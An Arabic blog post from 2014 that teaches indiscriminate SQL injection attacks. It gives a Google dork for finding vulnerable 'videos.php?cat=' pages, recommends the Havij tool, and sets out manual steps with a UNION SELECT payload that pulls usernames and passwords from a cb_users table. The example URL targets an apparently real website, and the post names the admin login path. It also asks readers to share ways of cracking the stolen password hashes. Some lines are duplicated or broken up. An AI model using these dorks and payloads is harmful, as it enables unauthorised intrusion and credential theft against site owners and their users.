الثلاثاء، 28 يناير 2014
الاختراق العشواءي دورك ثغرة SQL
بسم الله الرحمن الرحيم
ثغرة SQL
الاستغلال تقدر تستخدم برنامج havij أو
عن طريق الاستغلال اليدوي
تضيف اخر الرابط لما تطلع عدد العواميد
وبدال العامود المصاب
شيل المسافة الموجودة في كلمة na me
ولما تاخذ اليوزر جاء وقت كلمة المرور
ضيف بدال العامود المصاب
المشكلة يطلع الباسورد في صورة هاش يصعب فكه
الي يلقى طريقة لفكه لا يبخل علينا في وضعها
مثال
ثغرة SQL
كود:
inurl:"videos.php?cat="
عن طريق الاستغلال اليدوي
تضيف اخر الرابط لما تطلع عدد العواميد
كود:
+from+cb_user
كود:
usern ame
ولما تاخذ اليوزر جاء وقت كلمة المرور
ضيف بدال العامود المصاب
كود:
password
الي يلقى طريقة لفكه لا يبخل علينا في وضعها
مثال
كود:
http://alfatimi.tv/videos.php?cat=-1238+union+select+1,2,user****,4,5,6,7,8,9+from+cb_users--
مسار لوحة التحكم
كود:
http://localhost/admin_area/login.php
0 التعليقات:
إرسال تعليق